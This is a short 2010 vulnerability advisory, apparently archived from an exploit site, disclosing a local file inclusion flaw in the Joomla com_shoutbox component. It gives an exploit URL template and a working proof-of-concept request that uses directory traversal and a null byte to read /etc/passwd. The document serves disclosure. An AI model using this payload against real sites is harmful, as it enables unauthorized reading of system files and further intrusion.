id: 11634
date: 04/05/2010
title: Joomla Component com_shoutbox LFI Vulnerability
author: Vrs-hCk
cves: 

===============================================
Joomla Component com_shoutbox LFI Vulnerability
===============================================

================================================================================================
 
 Title    : Joomla Component com_shoutbox LFI Vulnerability
 Download : http://joomlacode.org/gf/project/shoutbox
 
 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/
 
 ================================================================================================
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_shoutbox&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2023-03-25]  #